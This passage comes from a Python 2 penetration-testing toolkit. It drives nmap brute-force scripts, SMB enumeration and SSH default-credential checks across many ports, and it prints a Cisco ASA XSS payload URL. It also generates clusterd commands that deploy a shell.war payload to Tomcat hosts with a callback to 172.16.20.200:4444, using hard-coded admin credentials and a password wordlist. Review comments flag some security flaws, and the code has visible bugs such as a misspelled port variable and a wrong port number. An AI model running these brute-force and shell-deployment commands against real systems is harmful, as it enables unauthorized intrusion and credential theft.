"+logFilename 1852 | cmdList.append(["3389",hostNo,fullCmd]) 1853 | fullCmd = "nmap -sV --script=rdp-ms12-020 -p 3389 "+host+" 2>&1 >> "+logFilename 1854 | cmdList.append(["3389",hostNo,fullCmd]) 1855 | 1856 | if taskToRun=="5432" or taskToRun=="all": 1857 | filename = origPath+"/port5432.txt" 1858 | p5432List=[] 1859 | if os.path.exists(filename): 1860 | with open(filename) as f: 1861 | for line in f: 1862 | line = line.strip() 1863 | p5432List.append(line) 1864 | for host in p5432List: 1865 | host = host.strip() 1866 | logFilename=origPath+"/runPort5432_"+host+".log" 1867 | if not os.path.exists(logFilename): 1868 | fullCmd = "nmap -p 5432 --script pgsql-brute "+host+" 2>&1 >> "+logFilename 1869 | if quiet==False: 1870 | print fullCmd 1871 | cmdList.append(["5432",hostNo,fullCmd]) 1872 | 1873 | if taskToRun=="5666" or taskToRun=="all": 1874 | filename = origPath+"/port5666.txt" 1875 | p5666List=[] 1876 | if os.path.exists(filename): 1877 | with open(filename) as f: 1878 | for line in f: 1879 | p5666List.append(line) 1880 | logFilename=origPath+"/runPort5666.log" 1881 | if not os.path.exists(logFilename): 1882 | for host in p5666List: 1883 | host = host.strip() 1884 | fullCmd = "nmap --script nrpe-enum -p 5666 "+host+" 2>&1 >> "+logFilename 1885 | if quiet==False: 1886 | print fullCmd 1887 | cmdList.append(["5666",hostNo,fullCmd]) 1888 | 1889 | if taskToRun=="5850" or taskToRun=="all": 1890 | filename = origPath+"/port5850.txt" 1891 | p5850List=[] 1892 | if os.path.exists(filename): 1893 | with open(filename) as f: 1894 | for line in f: 1895 | p5850List.append(line) 1896 | logFilename=origPath+"/runPort5850.log" 1897 | if not os.path.exists(logFilename): 1898 | for host in p5850List: 1899 | host = host.strip() 1900 | 1901 | fullCmd = "nmap -p 5850 --script openlookup-info "+host+" 2>&1 >> "+logFilename 1902 | if quiet==False: 1903 | print fullCmd 1904 | cmdList.append(["5850",hostNo,fullCmd]) 1905 | 1906 | if taskToRun=="9390" or taskToRun=="all": 1907 | filename 
= origPath+"/port9390.txt" 1908 | p9390List=[] 1909 | if os.path.exists(filename): 1910 | with open(filename) as f: 1911 | for line in f: 1912 | p9390List.append(line) 1913 | logFilename=origPath+"/runPort9390.log" 1914 | if not os.path.exists(logFilename): 1915 | for host in p9390List: 1916 | host = host.strip() 1917 | 1918 | fullCmd = "nmap -p 9390 --script omp2-brute,omp2-enum-targets "+host+" 2>&1 >> "+logFilename 1919 | if quiet==False: 1920 | print fullCmd 1921 | cmdList.append(["9390",hostNo,fullCmd]) 1922 | 1923 | if taskToRun=="9391" or taskToRun=="all": 1924 | filename = origPath+"/port9391.txt" 1925 | p9391List=[] 1926 | if os.path.exists(filename): 1927 | with open(filename) as f: 1928 | for line in f: 1929 | p9391List.append(line) 1930 | logFilename=origPath+"/runPort9391.log" 1931 | if not os.path.exists(logFilename): 1932 | for host in p9391List: 1933 | host = host.strip() 1934 | 1935 | fullCmd = "nmap -sV --script=openvas-otp-brute -p 9193 "+host+" 2>&1 >> "+logFilename 1936 | if quiet==False: 1937 | print fullCmd 1938 | cmdList.append(["9193",hostNo,fullCmd]) 1939 | if quiet==False: 1940 | print fullCmd 1941 | cmdList.append(["9193",hostNo,fullCmd]) 1942 | 1943 | if taskToRun=="9929" or taskToRun=="all": 1944 | filename = origPath+"/port9929.txt" 1945 | p9929List=[] 1946 | if os.path.exists(filename): 1947 | with open(filename) as f: 1948 | for line in f: 1949 | p9929List.append(line) 1950 | logFilename=origPath+"/runPort9929.log" 1951 | if not os.path.exists(logFilename): 1952 | for host in p9929List: 1953 | host = host.strip() 1954 | 1955 | fullCmd = "nmap -p 9929 --script nping-brute "+host+" 2>&1 >> "+logFilename 1956 | if quiet==False: 1957 | print fullCmd 1958 | cmdList.append(["9929",hostNo,fullCmd]) 1959 | 1960 | 1961 | if taskToRun=="49152" or taskToRun=="all": 1962 | filename = origPath+"/port49152.txt" 1963 | p49152List=[] 1964 | if os.path.exists(filename): 1965 | with open(filename) as f: 1966 | for line in f: 1967 | 
p49152List.append(line) 1968 | logFilename=origPath+"/runPort9152.log" 1969 | if not os.path.exists(logFilename): 1970 | for host in p49152List: 1971 | host = host.strip() 1972 | 1973 | fullCmd = "nmap -p49152 --script supermicro-ipmi-conf "+host+" 2>&1 >> "+logFilename 1974 | if quiet==False: 1975 | print fullCmd 1976 | cmdList.append(["49152",hostNo,fullCmd]) 1977 | 1978 | 1979 | if taskToRun=="445" or taskToRun=="all" or taskToRun=="smb": 1980 | filename = origPath+"/port445.txt" 1981 | p445List=[] 1982 | if os.path.exists(filename): 1983 | with open(filename) as f: 1984 | for line in f: 1985 | p445List.append(line) 1986 | #cmdList = [] 1987 | for host in p445List: 1988 | host = host.strip() 1989 | logFilename=origPath+"/enum4linux_"+host+".log" 1990 | if not os.path.exists(logFilename): 1991 | fullCmd = "/pentest/SpiderLabs/enum4linux.pl -a "+host+" 2>&1 >> "+logFilename 1992 | cmdList.append(["445",hostNo,fullCmd]) 1993 | logFilename1=origPath+"/port445_"+host+".log" 1994 | if not os.path.exists(logFilename): 1995 | if not os.path.exists(logFilename1): 1996 | fullCmd = "nmap --script smb-brute.nse -p445 -iL "+origPath+"/port445.txt 2>&1 >> "+logFilename1 1997 | cmdList.append(["445",hostNo,fullCmd]) 1998 | logFilename=origPath+"/smbclient_"+host+".log" 1999 | if not os.path.exists(logFilename): 2000 | if not os.path.exists(logFilename): 2001 | fullCmd = "smbclient -L //"+host+" -N -U 'test%test'>> "+logFilename 2002 | cmdList.append(["445",hostNo,fullCmd]) 2003 | 2004 | 2005 | if taskToRun=="137" or taskToRun=="all": 2006 | filename = origPath+"/port137.txt" 2007 | p137List=[] 2008 | if os.path.exists(filename): 2009 | with open(filename) as f: 2010 | for line in f: 2011 | p137List.append(line) 2012 | #cmdList = [] 2013 | for host in p137List: 2014 | host = host.strip() 2015 | 2016 | logFilename=origPath+"/port137_"+host+".log" 2017 | if not os.path.exists(logFilename): 2018 | fullCmd = "sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 "+host[0]+" 2>&1 
>> "+logFilename 2019 | cmdList.append(["137",hostNo,fullCmd]) 2020 | 2021 | 2022 | if taskToRun=="53" or taskToRun=="all" or taskToRun=="dns": 2023 | filename = origPath+"/port53.txt" 2024 | p53List=[] 2025 | if os.path.exists(filename): 2026 | with open(filename) as f: 2027 | for line in f: 2028 | p53List.append(line) 2029 | #cmdList = [] 2030 | for host in p53List: 2031 | host = host.strip() 2032 | print host 2033 | try: 2034 | if len(options.domainName)>0: 2035 | logFilename=origPath+"/runPort53_zonetransfer_"+host+".log" 2036 | if not os.path.exists(logFilename): 2037 | fullCmd = "nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain="+options.domainName+" "+domainName+" "+host+" 2>&1 >> "+logFilename 2038 | cmdList.append(fullCmd) 2039 | cmdList.append(["53",hostNo,fullCmd]) 2040 | 2041 | except TypeError: 2042 | continue 2043 | logFilename=origPath+"/runPort53_cache_"+host+".log" 2044 | if not os.path.exists(logFilename): 2045 | fullCmd = "nmap -Pn -sU -p 53 -Pn --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={yahoo.com,google.com,gmail.google.com}' "+host+" 2>&1 >> "+logFilename 2046 | cmdList.append(["137",hostNo,fullCmd]) 2047 | 2048 | logFilename=origPath+"/runPort53_dig_"+host+".log" 2049 | if not os.path.exists(logFilename): 2050 | fullCmd = "dig +short yahoo.com TXT @"+host+" 2>&1 >> "+logFilename 2051 | cmdList.append(["137",hostNo,fullCmd]) 2052 | 2053 | 2054 | if len(cmdList)>0: 2055 | print "- Sorting cmdList" 2056 | cmdList = sorted(cmdList, key=lambda x: x[0]) 2057 | 2058 | print "- Slicing cmdList into chunks" 2059 | tempList = chunk(cmdList, int(numProcesses)) 2060 | totalCount=len(tempList) 2061 | count = 1 2062 | for urlList in tempList: 2063 | jobs = [] 2064 | jobid=0 2065 | print "- Set "+str(count)+" of "+str(totalCount) 2066 | for url in urlList: 2067 | if url!=None: 2068 | print "- Testing: "+url[1]+"\t"+url[0] 2069 | jobs.append((jobid,url[0],url[1],url[2])) 2070 
| jobid = jobid+1 2071 | resultsList = execute1(jobs,numProcesses) 2072 | for i in resultsList: 2073 | if i[1]=="telnet": 2074 | resultsList1 = i[3].split("\n") 2075 | for line in resultsList1: 2076 | line = line.strip() 2077 | if "found:" in line.lower(): 2078 | resultListtelnet.append(i[2]) 2079 | resultListtelnet.append(line) 2080 | if i[1]=="ssh": 2081 | resultsList1 = i[3].split("\n") 2082 | for line in resultsList1: 2083 | line = line.strip() 2084 | if "found:" in line.lower(): 2085 | resultListssh.append(i[2]) 2086 | resultListssh.append(line) 2087 | if i[1]=="whatweb": 2088 | resultsList1 = i[3].split("\n") 2089 | for line in resultsList1: 2090 | line = line.strip() 2091 | resultListwhatweb.append(line) 2092 | if i[1]=="shellshock": 2093 | resultsList1 = i[3].split("\n") 2094 | for line in resultsList1: 2095 | line = line.strip() 2096 | resultListshellshock.append(line) 2097 | if i[1]=="clusterd": 2098 | resultsList1 = i[3].split("\n") 2099 | #ansi_escape = re.compile(r'\x1b[^m]*m') 2100 | #hostNo = i[2] 2101 | #for line in resultsList1: 2102 | # line = line.strip() 2103 | # line = ansi_escape.sub('', line) 2104 | # resultListclusterd.append(line) 2105 | 2106 | if i[1]=="sslcert": 2107 | resultsList1 = i[3].split("\n") 2108 | for line in resultsList1: 2109 | line = line.strip() 2110 | if "| ssl-cert: Subject: commonName=" in line and "*." 
not in line: 2111 | hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 2112 | resultListsslcert.append(i[2]+"\t"+hostName) 2113 | 2114 | if i[1]=="heartbleed": 2115 | resultsList1 = i[3].split("\n") 2116 | for line in resultsList1: 2117 | line = line.strip() 2118 | if "VULNERABLE:" in line: 2119 | resultListheartbleed.append(i[2]) 2120 | if i[1]=="sslknownkey": 2121 | resultsList1 = i[3].split("\n") 2122 | for line in resultsList1: 2123 | line = line.strip() 2124 | if "Found in" in line: 2125 | resultListsslknownkey.append(i[2]) 2126 | resultListsslknownkey.append(line) 2127 | 2128 | if i[1]=="sslccs": 2129 | resultsList1 = i[3].split("\n") 2130 | for line in resultsList1: 2131 | hostName = i[2] 2132 | if "may allow early" in line: 2133 | resultListsslccs.append(i[2]) 2134 | resultListsslccs.append(line) 2135 | if i[1]=="sslcert": 2136 | commonNamesList=[] 2137 | resultsList1 = i[3].split("\n") 2138 | tempTitle = "" 2139 | for line in resultsList1: 2140 | line = line.strip() 2141 | if "| ssl-cert: Subject: commonName=" in line and "*." 
not in line: 2142 | hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 2143 | commonNamesList.append(i[2]+"\t"+hostName) 2144 | if len(commonNamesList)>0: 2145 | print "Found the below common names in the SSL certificates" 2146 | for host in commonNamesList: 2147 | print host 2148 | 2149 | 2150 | resultList = i[3].split("\n") 2151 | count+=1 2152 | 2153 | if len(tomcatFoundList)>0: 2154 | for x in tomcatFoundList: 2155 | print x 2156 | for x in tomcatFoundList: 2157 | bruteForceTomcat(x) 2158 | 2159 | 2160 | filename = origPath+"/report.txt" 2161 | reportFilename = open(filename,"w") 2162 | 2163 | 2164 | if len(resultListwhatweb)>0: 2165 | header = "******************************** WhatWeb ********************************" 2166 | reportFilename.write(header+"\n") 2167 | for x in resultListwhatweb: 2168 | reportFilename.write(x+"\n") 2169 | 2170 | if len(resultListsslcert)>0: 2171 | header = "******************************** SSL Cert ********************************" 2172 | reportFilename.write(header+"\n") 2173 | for x in resultListsslcert: 2174 | reportFilename.write(x+"\n") 2175 | 2176 | if len(resultListsslknownkey)>0: 2177 | header = "******************************** SSL Known Key ********************************" 2178 | reportFilename.write(header+"\n") 2179 | for x in resultListsslknownkey: 2180 | reportFilename.write(x+"\n") 2181 | 2182 | if len(resultListsslccs)>0: 2183 | header = "******************************** SSL CCS ********************************" 2184 | reportFilename.write(header+"\n") 2185 | for x in resultListsslccs: 2186 | reportFilename.write(x+"\n") 2187 | 2188 | if len(resultListheartbleed)>0: 2189 | header = "******************************** SSL Heartbleed ********************************" 2190 | reportFilename.write(header+"\n") 2191 | for x in resultListheartbleed: 2192 | reportFilename.write(x+"\n") 2193 | 2194 | if len(resultListssh)>0: 2195 | header = "******************************** SSH 
********************************" 2196 | reportFilename.write(header+"\n") 2197 | for x in resultListssh: 2198 | reportFilename.write(x+"\n") 2199 | 2200 | if len(resultListtelnet)>0: 2201 | header = "******************************** Telnet ********************************" 2202 | reportFilename.write(header+"\n") 2203 | for x in resultListtelnet: 2204 | reportFilename.write(x+"\n") 2205 | 2206 | #for x in resultListssl: 2207 | # reportFilename.write(x+"\n") 2208 | 2209 | if len(resultList25)>0: 2210 | header = "******************************** Port 25 ********************************" 2211 | reportFilename.write(header+"\n") 2212 | for x in resultList25: 2213 | reportFilename.write(x+"\n") 2214 | 2215 | if len(resultList53)>0: 2216 | header = "******************************** Port 53********************************" 2217 | reportFilename.write(header+"\n") 2218 | for x in resultList53: 2219 | reportFilename.write(x+"\n") 2220 | 2221 | if len(resultList137)>0: 2222 | header = "******************************** Port 137 ********************************" 2223 | reportFilename.write(header+"\n") 2224 | for x in resultList137: 2225 | reportFilename.write(x+"\n") 2226 | 2227 | if len(resultList139)>0: 2228 | header = "******************************** Port 139 ********************************" 2229 | reportFilename.write(header+"\n") 2230 | for x in resultList139: 2231 | reportFilename.write(x+"\n") 2232 | 2233 | if len(resultList161)>0: 2234 | header = "******************************** Port 161 ********************************" 2235 | reportFilename.write(header+"\n") 2236 | for x in resultList161: 2237 | reportFilename.write(x+"\n") 2238 | 2239 | if len(resultList445)>0: 2240 | header = "******************************** Port 445 ********************************" 2241 | reportFilename.write(header+"\n") 2242 | for x in resultList445: 2243 | reportFilename.write(x+"\n") 2244 | 2245 | if len(resultList500)>0: 2246 | header = "******************************** Port 500 
********************************" 2247 | reportFilename.write(header+"\n") 2248 | for x in resultList500: 2249 | reportFilename.write(x+"\n") 2250 | 2251 | if len(resultList512)>0: 2252 | header = "******************************** Port 512 ********************************" 2253 | reportFilename.write(header+"\n") 2254 | for x in resultList512: 2255 | reportFilename.write(x+"\n") 2256 | 2257 | if len(resultList513)>0: 2258 | header = "******************************** Port 513 ********************************" 2259 | reportFilename.write(header+"\n") 2260 | for x in resultList513: 2261 | reportFilename.write(x+"\n") 2262 | 2263 | if len(resultList554)>0: 2264 | header = "******************************** Port 554 ********************************" 2265 | reportFilename.write(header+"\n") 2266 | for x in resultList554: 2267 | reportFilename.write(x+"\n") 2268 | 2269 | if len(resultList873)>0: 2270 | header = "******************************** Port 873 ********************************" 2271 | reportFilename.write(header+"\n") 2272 | for x in resultList873: 2273 | reportFilename.write(x+"\n") 2274 | 2275 | if len(resultList902)>0: 2276 | header = "******************************** Port 902 ********************************" 2277 | reportFilename.write(header+"\n") 2278 | for x in resultList902: 2279 | reportFilename.write(x+"\n") 2280 | 2281 | if len(resultList1080)>0: 2282 | header = "******************************** Port 1080 ********************************" 2283 | reportFilename.write(header+"\n") 2284 | for x in resultList1080: 2285 | reportFilename.write(x+"\n") 2286 | 2287 | if len(resultList1099)>0: 2288 | header = "******************************** Port 1099 ********************************" 2289 | reportFilename.write(header+"\n") 2290 | for x in resultList1099: 2291 | reportFilename.write(x+"\n") 2292 | 2293 | if len(resultList1723)>0: 2294 | header = "******************************** Port 1723 ********************************" 2295 | 
reportFilename.write(header+"\n") 2296 | for x in resultList1723: 2297 | reportFilename.write(x+"\n") 2298 | 2299 | if len(resultList2002)>0: 2300 | header = "******************************** Port 2002 ********************************" 2301 | reportFilename.write(header+"\n") 2302 | for x in resultList2002: 2303 | reportFilename.write(x+"\n") 2304 | 2305 | if len(resultList2010)>0: 2306 | header = "******************************** Port 2010 ********************************" 2307 | reportFilename.write(header+"\n") 2308 | for x in resultList2010: 2309 | reportFilename.write(x+"\n") 2310 | 2311 | if len(resultList2401)>0: 2312 | header = "******************************** Port 2401 ********************************" 2313 | reportFilename.write(header+"\n") 2314 | for x in resultList2401: 2315 | reportFilename.write(x+"\n") 2316 | 2317 | if len(resultList3306)>0: 2318 | header = "******************************** Port 3389 ********************************" 2319 | reportFilename.write(header+"\n") 2320 | for x in resultList3306: 2321 | reportFilename.write(x+"\n") 2322 | 2323 | if len(resultList3389)>0: 2324 | header = "******************************** Port 3389 ********************************" 2325 | reportFilename.write(header+"\n") 2326 | for x in resultList3389: 2327 | reportFilename.write(x+"\n") 2328 | 2329 | if len(resultList5432)>0: 2330 | header = "******************************** Port 5432 ********************************" 2331 | reportFilename.write(header+"\n") 2332 | for x in resultList5432: 2333 | reportFilename.write(x+"\n") 2334 | 2335 | if len(resultList5850)>0: 2336 | header = "******************************** Port 5850 ********************************" 2337 | reportFilename.write(header+"\n") 2338 | for x in resultList5850: 2339 | reportFilename.write(x+"\n") 2340 | 2341 | if len(resultList5900)>0: 2342 | header = "******************************** Port 5900 ********************************" 2343 | reportFilename.write(header+"\n") 2344 | for x in 
resultList5900: 2345 | reportFilename.write(x+"\n") 2346 | 2347 | if len(resultList6379)>0: 2348 | header = "******************************** Port 6379 ********************************" 2349 | reportFilename.write(header+"\n") 2350 | for x in resultList6379: 2351 | reportFilename.write(x+"\n") 2352 | 2353 | if len(resultList8098)>0: 2354 | header = "******************************** Port 8098 ********************************" 2355 | reportFilename.write(header+"\n") 2356 | for x in resultList8098: 2357 | reportFilename.write(x+"\n") 2358 | 2359 | if len(resultList9160)>0: 2360 | header = "******************************** Port 9160 ********************************" 2361 | reportFilename.write(header+"\n") 2362 | for x in resultList9160: 2363 | reportFilename.write(x+"\n") 2364 | 2365 | if len(resultList5432)>0: 2366 | header = "******************************** Port 5432 ********************************" 2367 | reportFilename.write(header+"\n") 2368 | for x in resultList5432: 2369 | reportFilename.write(x+"\n") 2370 | 2371 | if len(resultList5666)>0: 2372 | header = "******************************** Port 5666 ********************************" 2373 | reportFilename.write(header+"\n") 2374 | for x in resultList5666: 2375 | reportFilename.write(x+"\n") 2376 | 2377 | if len(resultList9390)>0: 2378 | header = "******************************** Port 9390 ********************************" 2379 | reportFilename.write(header+"\n") 2380 | for x in resultList9390: 2381 | reportFilename.write(x+"\n") 2382 | 2383 | if len(resultList9391)>0: 2384 | header = "******************************** Port 9391 ********************************" 2385 | reportFilename.write(header+"\n") 2386 | for x in resultList9391: 2387 | reportFilename.write(x+"\n") 2388 | 2389 | if len(resultList9929)>0: 2390 | header = "******************************** Port 9929 ********************************" 2391 | reportFilename.write(header+"\n") 2392 | for x in resultList9929: 2393 | reportFilename.write(x+"\n") 
# --- tail of parseLogs(): its definition starts before this chunk ---
    if len(resultList27017)>0:
        header = "******************************** Port 27017 ********************************"
        reportFilename.write(header+"\n")
        for x in resultList27017:
            reportFilename.write(x+"\n")

    if len(resultList49152)>0:
        header = "******************************** Port 49152 ********************************"
        reportFilename.write(header+"\n")
        for x in resultList49152:
            reportFilename.write(x+"\n")

    # report.txt (opened earlier in this function) is complete at this point.
    reportFilename.close()
    ##End of Module


    if len(resultListASAXSS)>0:
        print "\n****** Cisco ASA XSS Vulnerability ****** "
        for x in resultListASAXSS:
            print "https://"+x+"/+CSCOE+/logon.html?reason=2&auth_handle=\"%20style%3dbehavior%3aurl('%23default%23time2')%20onbegin%3d'alert(String.fromCharCode(88,83,83))'"


if __name__ == '__main__':
    # Entry point of the multi-task runner.  Every name assigned in this block
    # (options, numProcesses, taskToRun, ...) is a module global; that is how
    # runModules()/parseLogs() (defined earlier in the file) pick them up.
    #global numProcesses
    parser = argparse.ArgumentParser()
    parser.add_argument('-quiet', action='store_true', help='[only show results]')
    parser.add_argument('-results', action='store_true', help='[parse log files and show results]')
    parser.add_argument('-tasks', dest='taskName', action='store', help='[task name]')
    parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]')
    parser.add_argument('-domain', dest='domainName', action='store', help='[domain name]')

    #if len(sys.argv)==1:
    #    parser.print_help()
    #    sys.exit(1)

    options = parser.parse_args()

    os.chdir(origPath)
    # Task names understood by runModules(); the numeric entries are port
    # numbers.  This list is only consulted when -tasks is "all".
    taskList=[]
    taskList.append("bruteURL")
    taskList.append("1080")
    taskList.append("1098")
    taskList.append("1099")
    taskList.append("137")
    taskList.append("139")
    taskList.append("1723")
    taskList.append("2002")
    taskList.append("2010")
    taskList.append("2401")
    taskList.append("25")
    taskList.append("27017")
    taskList.append("3306")
    taskList.append("3389")
    taskList.append("49152")
    taskList.append("5060")
    taskList.append("512")
    taskList.append("513")
    taskList.append("5432")
    taskList.append("554")
    taskList.append("5666")
    taskList.append("5850")
    taskList.append("5900")
    taskList.append("6379")
    taskList.append("8098")
    taskList.append("873")
    taskList.append("902")
    taskList.append("9160")
    taskList.append("9390")
    taskList.append("9391")
    taskList.append("9929")
    taskList.append("asa")
    taskList.append("clusterd")
    taskList.append("dns")
    taskList.append("ftp")
    taskList.append("ntp")
    #taskList.append("shellshock")
    taskList.append("smb")
    taskList.append("snmp")
    taskList.append("ssh")
    taskList.append("ssl")
    taskList.append("telnet")
    taskList.append("tilde")
    taskList.append("vpn")
    taskList.append("whatweb")
    taskList.append("xmpp")
    taskList.append("yasuo")

    #Removing empty log files
    # Zero-byte *.log files in the working directory are deleted so that
    # parseLogs() does not see them.
    # NOTE(review): `glob` is not among the imports visible in this chunk —
    # confirm it is imported near the top of the file.
    for filename in glob.glob(os.getcwd()+"/*.log"):
        if os.stat(filename).st_size == 0:
            os.remove(filename)
    if options.results:
        parseLogs()
        sys.exit()
    if options.domainName:
        # NOTE(review): self-assignment; presumably `domainName = options.domainName`
        # was intended.  As written this raises NameError unless `domainName`
        # already exists at module level (not visible in this chunk).
        domainName=domainName

    # The thread count is kept as a str here.  Its consumer (runModules /
    # execute1) is not visible in this chunk — confirm it converts to int
    # before use.
    if options.numProcesses:
        numProcesses=str(options.numProcesses)
    else:
        numProcesses=str(10)

    # Single task vs. "all".  Both the quiet and the non-quiet branch call
    # runModules(quiet=True), so -quiet currently makes no difference here.
    if (str(options.taskName).lower()).strip()!="all":
        if options.quiet:
            taskToRun=options.taskName
            runModules(quiet=True)
            sys.exit()
        else:
            taskToRun=options.taskName
            runModules(quiet=True)
            sys.exit()
    else:
        for taskName in taskList:
            taskToRun=taskName
            runModules(quiet=True)
        #parseLogs()
        sys.exit()

    '''
    #Zipping PeepingTom Screenshots
    #if glob.glob(os.getcwd()+"/peepingtom/1*"):
    #    cmd = "zip screenshots.zip -r "+os.getcwd()+"/peepingtom/1*"
    #    print commands.getoutput(cmd)
    '''

    #Parsing and Running Clusterd Attack Payloads
    # NOTE(review): every branch above ends in sys.exit(), so nothing from this
    # point on is reached when the script is run.  The indentation of this
    # section relative to the `if __name__` block cannot be recovered from the
    # source as pasted — confirm against the original file.
    resultList=[]
    for filename in glob.glob("runClusterd*.log"):
        #filename = sys.argv[1]
        # Log names are split on "_"; parts [1], [2] and [3] are read as
        # scheme, host and port (presumably runClusterd_<scheme>_<host>_<port>.log).
        filenameParts = filename.split("_")

        portNo = filenameParts[3].replace(".log","")
        hostIP = filenameParts[1]+"://"+filenameParts[2].replace(".log","")+":"+portNo

        lines = []
        with open(filename) as f:
            lines = f.read().splitlines()
        # Strips ANSI colour sequences before matching on the log text.
        ansi_escape = re.compile(r'\x1b[^m]*m')
        #found=False
        for line in lines:
            line = ansi_escape.sub('', line)
            if "] " in line:
                #if found==False:
                #    resultList.append("\n"+hostIP)
                #    found=True
                line1 = line.split("] ")[1].strip()
                resultList.append([hostIP,line1])
    if len(resultList)>0:
        # `file` shadows the builtin; both scripts below are opened in append
        # mode, so repeated runs keep adding commands to the same files.
        # NOTE(review): clusterdPath is not defined anywhere in this chunk.
        file = open("runJboss.sh", "a+")
        cmd = "cd /tmp1/clusterd"
        file.write(cmd+"\n")
        for result in resultList:
            if "jboss" in result[1].lower():
                scheme = result[0].split(":")[0]
                hostNo = result[0].split(":")[1].replace("//","")
                portNo = result[0].split(":")[2]

                url = scheme+"://"+hostNo+":"+portNo
                if scheme=="http":
                    cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py -i "+hostNo+" -p "+portNo+" -a jboss -v4.2 --random-agent --jb-smb --jb-info"
                if scheme=="https":
                    cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py --ssl -i "+hostNo+" -p "+portNo+" -a jboss -v4.2 --random-agent --jb-smb --jb-info"
                print cmd
                file.write(cmd+"\n")
        file.close()

        file = open("runTomcat.sh", "a+")
        cmd = "cd /tmp1/clusterd"
        file.write(cmd+"\n")
        for result in resultList:
            if "tomcat manager" in result[1].lower():
                scheme = result[0].split(":")[0]
                hostNo = result[0].split(":")[1].replace("//","")
                # NOTE(review): typo — this assigns `porTNo`, so the `portNo`
                # used in the commands below is the stale value left by the
                # previous loop and the generated command carries the wrong port.
                porTNo = result[0].split(":")[2]

                #cmd = "python /tmp1/clusterd/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --tc-ofetch --tc-info --tc-list --tc-smb"
                #cmd = "python /tmp1/clusterd/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o windows -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb""

                # Security note: the credential passed via --usr-auth and the
                # callback address are hard-coded into the command line, so they
                # end up in shell history, in `ps` output of every local user and
                # in runTomcat.sh on disk.  Keep such values out of argv.
                if scheme=="http":
                    cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --usr-auth admin:Tomct123$ --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o linux -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb"
                if scheme=="https":
                    cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py --ssl -i "+hostNo+" -p "+portNo+" -a tomcat --usr-auth admin:Tomct123$ --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o linux -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb"

                print cmd
                file.write(cmd+"\n")
        file.close()
--------------------------------------------------------------------------------
/runSSHmulti.py:
--------------------------------------------------------------------------------
#! /usr/bin/env python

from multiprocessing import Queue
import multiprocessing
import commands
import sys
import argparse
import os

origPath = os.getcwd()
# All wordlists are looked up under /tmp/tools/.
# Security note: /tmp is writable by every local user, and downloadFiles()
# skips the download when a file already exists, so a file planted there by
# another local user is used silently.  Prefer a directory owned by the
# invoking user with restrictive permissions.
toolsPath = "/tmp/tools/"
numProcesses = 10

def downloadFiles():
    """Fetch the SSH and telnet wordlists into toolsPath if they are not there yet.

    Python 2 only (urllib.URLopener).  No integrity check (hash or
    signature) is performed on the downloaded files; the exists-check is
    the only thing that decides whether the download happens.
    """
    import urllib
    if not os.path.exists(toolsPath+"wordList_ssh.txt"):
        testfile = urllib.URLopener()
        testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh.txt", toolsPath+"wordList_ssh.txt")
    if not os.path.exists(toolsPath+"wordList_telnet.txt"):
        testfile = urllib.URLopener()
        testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt", toolsPath+"wordList_telnet.txt")

def RunCommand(fullCmd):
    """Run fullCmd through the shell and return its combined stdout/stderr.

    commands.getoutput() goes through /bin/sh, so any host/port text the
    caller splices into fullCmd (it comes from the input file) is
    interpreted by the shell unescaped.  The bare except also swallows
    KeyboardInterrupt and hides the real error behind a generic string.
    """
    try:
        return commands.getoutput(fullCmd)
    except:
        return "Error executing command %s" %(fullCmd)
class Worker1(multiprocessing.Process):
    """Worker process that drains (jobid, hostNo, runCmd) jobs from work_queue.

    For each job it runs runCmd via RunCommand() and puts
    (jobid, hostNo, output) on result_queue.
    """

    def __init__(self,
                 work_queue,
                 result_queue,
                 ):
        multiprocessing.Process.__init__(self)
        self.work_queue = work_queue
        self.result_queue = result_queue
        # Checked by run(); nothing in this chunk ever sets it to True.
        self.kill_received = False
    def run(self):
        # multiprocessing.Queue.empty() is documented as unreliable, so the
        # loop really ends when get_nowait() raises (expected: Queue.Empty;
        # the bare except catches everything else as well).
        while (not (self.kill_received)) and (self.work_queue.empty()==False):
            try:
                job = self.work_queue.get_nowait()
            except:
                break
            (jobid,hostNo,runCmd) = job
            rtnVal = (jobid,hostNo,RunCommand(runCmd))
            self.result_queue.put(rtnVal)

def execute1(jobs, num_processes=2):
    """Run every job in jobs across num_processes Worker1 processes.

    jobs: list of (jobid, hostNo, runCmd) tuples.
    Returns the (jobid, hostNo, output) tuples sorted by jobid.  Blocks
    until one result per job has been read; the workers are started but
    never joined.  num_processes must be an int (it is passed to range()).
    """
    work_queue = multiprocessing.Queue()
    for job in jobs:
        work_queue.put(job)

    result_queue = multiprocessing.Queue()
    worker = []
    for i in range(num_processes):
        worker.append(Worker1(work_queue, result_queue))
        worker[i].start()

    results = []
    while len(results) < len(jobs):
        result = result_queue.get()
        results.append(result)
    results.sort()
    return (results)
os.chdir(origPath)

# (host, port) tuples read from the -file argument; despite the name these
# are the SSH targets of this script.
sslList=[]

def runModules(quiet):
    """Run the SSH checks against every (host, port) in the module-global sslList.

    quiet: when False, each command line is printed before it is run.
    Reads the module globals sslList, numProcesses and toolsPath.
    """
    #Start of Module
    results = "\n- Checking for Nmap SSHv1"
    print results
    jobs = []
    jobid = 0

    for host in sslList:
        # host[0]/host[1] come straight from the input file and are spliced
